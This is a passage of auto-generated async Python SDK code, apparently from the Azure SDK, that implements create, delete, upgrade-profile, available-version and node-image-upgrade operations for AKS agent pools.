content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an agent pool in the specified managed cluster.
Deletes an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def get_upgrade_profile(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.AgentPoolUpgradeProfile":
"""Gets the upgrade profile for an agent pool.
Gets the upgrade profile for an agent pool.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolUpgradeProfile, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPoolUpgradeProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolUpgradeProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_upgrade_profile_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self.get_upgrade_profile.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPoolUpgradeProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeProfiles/default'} # type: ignore
@distributed_trace_async
async def get_available_agent_pool_versions(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.AgentPoolAvailableVersions":
"""Gets a list of supported Kubernetes versions for the specified agent pool.
See `supported Kubernetes versions
<https://docs.microsoft.com/azure/aks/supported-kubernetes-versions>`_ for more details about
the version lifecycle.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolAvailableVersions, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPoolAvailableVersions
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolAvailableVersions"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_available_agent_pool_versions_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.get_available_agent_pool_versions.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPoolAvailableVersions', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_agent_pool_versions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/availableAgentPoolVersions'} # type: ignore
async def _upgrade_node_image_version_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> Optional["_models.AgentPool"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.AgentPool"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_upgrade_node_image_version_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self._upgrade_node_image_version_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 202:
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_upgrade_node_image_version_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion'} # type: ignore
@distributed_trace_async
async def begin_upgrade_node_image_version(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.AgentPool"]:
"""Upgrades the node image version of an agent pool to the latest.
Upgrading the node image version of an agent pool applies the newest OS and runtime updates to
the nodes. AKS provides one new image per week with the latest updates. For more details on
node image versions, see: https://docs.microsoft.com/azure/aks/node-image-upgrade.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_01_02_preview.models.AgentPool]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._upgrade_node_image_version_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_upgrade_node_image_version.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion'} # type: ignore
| 46.310292 | 291 | 0.68104 |
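The AgentPoolsOperations class in the row above is generated code and is not meant to be constructed by hand; it is reached through a generated client's agent_pools attribute. The following is a minimal usage sketch, assuming the publicly released azure-mgmt-containerservice async client and azure-identity packages rather than the vendored azure-cli-extensions copy, and using placeholder subscription, resource group, cluster, and pool names.

import asyncio

from azure.identity.aio import DefaultAzureCredential
from azure.mgmt.containerservice.aio import ContainerServiceClient

async def main() -> None:
    # Placeholder identifiers -- replace with real values.
    subscription_id = "00000000-0000-0000-0000-000000000000"
    resource_group = "my-rg"
    cluster_name = "my-aks-cluster"

    credential = DefaultAzureCredential()
    async with ContainerServiceClient(credential, subscription_id) as client:
        # client.agent_pools exposes the same surface as AgentPoolsOperations above.
        async for pool in client.agent_pools.list(resource_group, cluster_name):
            print(pool.name, pool.count, pool.orchestrator_version)

        # Long-running operations return an AsyncLROPoller; await result() to block
        # until the node image upgrade completes.
        poller = await client.agent_pools.begin_upgrade_node_image_version(
            resource_group, cluster_name, "nodepool1"
        )
        upgraded = await poller.result()
        print(upgraded.node_image_version)
    await credential.close()

if __name__ == "__main__":
    asyncio.run(main())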